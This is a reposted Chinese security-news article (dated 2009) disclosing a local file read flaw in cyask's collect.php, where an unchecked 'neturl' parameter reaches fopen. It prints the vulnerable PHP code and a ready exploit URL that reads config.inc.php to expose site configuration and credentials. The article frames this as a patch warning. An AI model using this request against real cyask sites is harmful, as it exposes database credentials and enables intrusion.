cyask的一个本地读文件的漏洞利用pc软件 文章资讯 手机软件

您当前的位置→图文中心新闻资讯安全播报cyask的一个本地读文件的漏洞利用

cyask的一个本地读文件的漏洞利用


2009/7/12  编辑:佚名 来源:本站整理

昨天就在晚上看到了一个这样的文章, 却没有人说利用的方法, 我自己研究了一下, 本来这么不复杂。
下面是这篇文章的内容。

下午帮同事看一个站, DZ的论坛, 该补的都补了, 咱也没圈day
之后逛了下有个仿百度知道的程序在上面, 和DZ整合了, 原以为也是Dz开发的, 估计也没啥问题
下来看代码, 看到collect.php


——————————-

PHP代码
else  
{   
/*  
检查网址  
*/  
$url=get_referer();   
$neturl=emptyempty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);   
  
$collect_url=emptyempty($neturl) ? $url : $neturl;   
  
$contents = ”;   
if($fid=@fopen($collect_url,”r“))   
{   
do  
{   
$data = fread($fid, 4096);   
if (strlen($data) == 0)   
{   
break;   
}   
$contents .= $data;   
}   
while(true);   
fclose($fid);   
}   
else  
{   
show_message(’collect_url_error’, ”);   
exit;   
}  
———————————-
害人啊, 本来还挺安全的一个站, 整合个毛呃……

找一个cyask的网站, 在其上面注册, 然后登录后, 输入http://www.×;××.com/collect.php?neturl=config.inc.php 在内容快照里面点右键, 点查看源文件程序, 哇, 什么都看到了, 我只是说出来利用方法, 真的希望大家尽早补漏洞。 一切损失与本人无关哦!

相关文章
  • Android RecyclerView实现下拉刷新和上拉加载更多
  • Android使用分类型RecyclerView仿各大商城首页
  • iphone7的cydia必装软件有哪些
  • Cydia闪退什么原因
  • 通过Cydia怎么安装360手机卫士
  • Cydia源列表怎么备份?
  • iOS9越狱Cydia闪退的解决方法
  • Cydia误删了怎么办?教大家Cydia误删后恢复方法
  • iOS8.3越狱安装升级补丁修复Cydia Substrate依赖不兼容问题
  • ios8苹果越狱后cydia无法安装插件解决方法
  • 发表评论
    阅读排行
    相关热门
    网站帮助 - 广告合作 - 下载声明 - 网站地图